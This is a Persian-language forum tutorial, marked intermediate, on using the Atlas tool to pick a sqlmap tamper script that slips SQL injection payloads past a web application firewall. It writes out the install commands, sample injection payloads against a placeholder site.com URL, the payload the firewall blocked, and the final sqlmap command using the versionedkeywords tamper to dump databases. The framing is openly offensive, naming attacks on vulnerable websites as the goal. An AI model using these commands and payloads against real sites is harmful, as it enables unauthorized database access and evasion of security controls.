mownten

آموزش یافتن tamper مناسب برای sqlmap در زمان مواجهه با WAF

پست های پیشنهاد شده

[سطح: متوسط]

با عرض سلام و تبریک سال نو به کاربران عزیز
من امروز با یه مورد خوب و مشکل گشا توی حملات SQLi مواجه شدم که تصمیم گرفتم بیام براتون توضیح بدم. مساله اینه که بیشترین انگیزه برای حمله برای اکثریت کاربران، حمله به وبسایت های آسیب پذیر در قبال باگ SQL Injection هست لکن بعضی واقع با فایروال هایی مواجه میشن و وقتی کار رو بصورت کامل هم میسپرن به دست sqlmap، باز به مشکل بر میخورن. اینجا مهاجم باید از Tamperها استفاده بکنه تا بتونه فایروال رو بایپس کنه اما یکی دو تا نیستن که و sqlmap هم فقط گاها space2comment رو پیشنهاد میده. چطور میشه کل تمپر ها رو تست کرد؟ با ابزاری به نام Atlas.

امروز با ابزار Atlas آشنا میشیم که برای بایپس کردن WAF یا IDS یا IPS و یافتن Tamper مناسب مفید هست. 

بریم سراغ اصل مطلب. دستورات نصب و اجرای این ابزار توی لینوکس به شرح زیر هست:

$ git clone https://github.com/m4ll0k/Atlas.git atlas
$ cd atlas
$ python atlas.py

فرض کنیم لینک اسیب پذیر ما این هست:

http://site.com/index.php?id=Price_ASC

و پیلود ما هم اینه:

-1234 AND 4321=4321-- AAAA

برای استفاده از این ابزار باید از دستور اینچنینی استفاده کنید:

$ python atlas.py --url http://site.com/index.php?id=Price_ASC --payload="-1234 AND 4321=4321-- AAAA" --dbms=mysql --random-agent -v

 

حالا این ابزار کجا و چه زمانی استفاده میشه؟

فرض کنید توی sqlmap از این دستور استفاده کردید و با یه WAF برخورد کردید:

$ python sqlmap.py -u 'http://site.com/index.php?id=Price_ASC' --dbs --random-agent -v 3

تصویر رو ببینید:

atlas-01.thumb.png.f099ebff0a8e9b623349c8722284231c.png

 

 

در اینجا پیلود به شرح زیر هست که توسط WAF یا IPS یا IDS بلاک شده و با خطای 403 Forbidden مواجه شده.

پیلود :

Price_ASC') AND 8716=4837 AND ('yajr'='yajr

کافیه همین پیلود رو ورداریم و بدیم به Atlas با tamper مناسب برای بایپس و حل این مشکل رو پیشنهاد بده. بدین شکل:

$ python atlas.py --url 'http://site.com/index.php?id=Price_ASC' --payload="') AND 8716=4837 AND ('yajr'='yajr" --random-agent -v

 

حالا نتیجه :

atlas-02.thumb.png.95987483f56c618a57c98d321bd3b272.png

میبینیم که در خط سبک رنگ به ما پیشنهاد داده شده که از تمپری به نام Versiondkeywords استفاده کنیم تا اون فایروال روی وبسایت هدف، بایپس بشه.

پس از این تمپر بدین شکل استفاده می کنیم:

$ python sqlmap.py -u 'http://site.com/index.php?id=Price_ASC' --dbs --random-agent -v 3 --tamper=versionedkeywords

لینک دریافت Atlas از Github:

https://github.com/m4ll0k/Atlas

 

موفق باشید.

سوالی هم داشتید در ادامه این تاپیک نپرسید. در تاپیک سوال و جواب بپرسید.

Atlas-sqlmap-tamper-suggesy-master.zip

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری